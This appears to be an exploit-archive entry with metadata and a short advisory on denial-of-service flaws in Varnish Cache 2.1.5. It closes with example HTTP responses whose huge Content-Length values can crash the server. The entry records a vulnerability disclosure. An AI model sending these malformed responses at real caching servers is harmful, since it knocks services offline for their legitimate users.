[] NeoSense

Varnish Cache - Multiple Denial of Service Vulnerabilities

Author: tytusromekiatomek
type: dos
platform: multiple
port: 
date_added: 2013-03-05 
date_updated: 2015-09-30 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/58314/info

Varnish Cache is prone to multiple denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the application, effectively denying service to legitimate users.

Varnish Cache 2.1.5 is vulnerable; other versions may also be affected.

The following example data is available:

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999

HTTP/1.1 200 OK
Content-Length: 2147483647